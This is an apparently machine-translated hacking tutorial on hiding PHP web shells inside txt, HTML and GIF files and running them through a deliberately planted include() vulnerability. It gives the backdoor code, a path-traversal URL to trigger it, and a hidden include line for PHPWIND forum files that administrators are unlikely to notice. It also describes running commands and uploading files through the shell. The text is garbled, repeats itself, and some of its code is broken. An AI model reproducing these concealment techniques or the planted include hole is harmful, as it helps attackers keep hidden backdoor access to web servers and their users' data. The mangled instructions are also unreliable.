Recently, many of my friends have asked me if I can hide my Trojan horse in HTML or images. I have inserted a Trojan horse into the php file, if it is hard to put it in an HTML file or image, let's take a look at this test report.
Recently, many of my friends have asked me if I can hide my Trojan horse in HTML or images. I have inserted a Trojan horse into the php file, if you want to put it in an HTML file or image, read the test report.
You need to know that if you put the PHP statement in the image, it cannot be executed in any way, because PHP only parses and expands the file named php. Therefore, PHP statements hidden in images must be executed. We use the PHP call functions such as include and require.
We still remember the articles that used to hide Trojans from pictures a few days ago. That is, use the include (\ "x.gif \") statement in the PHP file to call the Trojan statement that hides the hidden image. The statements in ASP are similar. It seems very hidden, but it is not difficult to create suspicious things for people who know PHP a little bit. Because the GET method in the URL is difficult to pass parameters, the performance of the inserted Trojan is not displayed.
The Include function is frequently used in PHP, so there are too many security titles. for example, the PHPWIND1.36 vulnerability is caused by no filtering of variables after include. Therefore, we can insert statements similar to the structure into the php file. Then, you can hide the Trojan horse in an image or HTML file, so that hiding is higher. For example, insert the following statement in the PHPWIND Forum:
<''? @ Include includ/. $ PHPWIND_ROOT ;? >
Generally, it cannot be seen by administrators.
With the include function, we can hide the PHP Trojan in many types of files, such as txt, html, and image files. Since txt, html, and image files are the most common in forums and document systems, we will test them in sequence.
First, create a php file test. php with the following content:
$ Test = $ _ GET [\ 'test \ '];
@ Include \ 'test/\ '. $ test
?>
Txt files are usually clarification files, so we can put a Trojan in the clarification file of the Directory. Create a txt file t.txt. We paste the scripts to the t.txt file. Then visit hxxp: // localhost/test. php? Test = ../t.txt. if you see the t.txt content, it confirms OK. Then, you can add hxxp: // localhost/test. PHP to the mini php backdoor client Trojan address in lanker? Add cmd to the password "test = ../t.txt". you can see all the results returned by performing the command.
HTML files are generally template files. In order to enable the Trojan horse inserted into the HTML file to be called and executed and not displayed, we can add a text box with hidden attributes in HTML, for example, and then use the same method as above. Generally, you can view the source file for the returned results. For example, you can view the efficacy of the program directory in the application. View the source file. The Directory C: \ Uniserver2_7s \ www \ test is displayed.
Next, let's talk about image files. the most poisonous way is to hide Trojans in images. We can compile an image directly and insert it to the end of the image.
Generally, the image is not affected by tests. Add the client Trojan address in the same way.
We can see that the result returned by the PHP environment variable is the original image.
There may be some gaps with the expected results. The actual command has been run, but the returned results are not visible. because this is a real GIF file, the returned results are not displayed, to verify whether the command is actually executed, we perform the file upload command. As expected, the file has been successfully uploaded to the server. The advantage of this fabricated scheme is that it has good hiding ability. Not to mention the problem. If you want to see the returned results, create a fake image file with your notepad.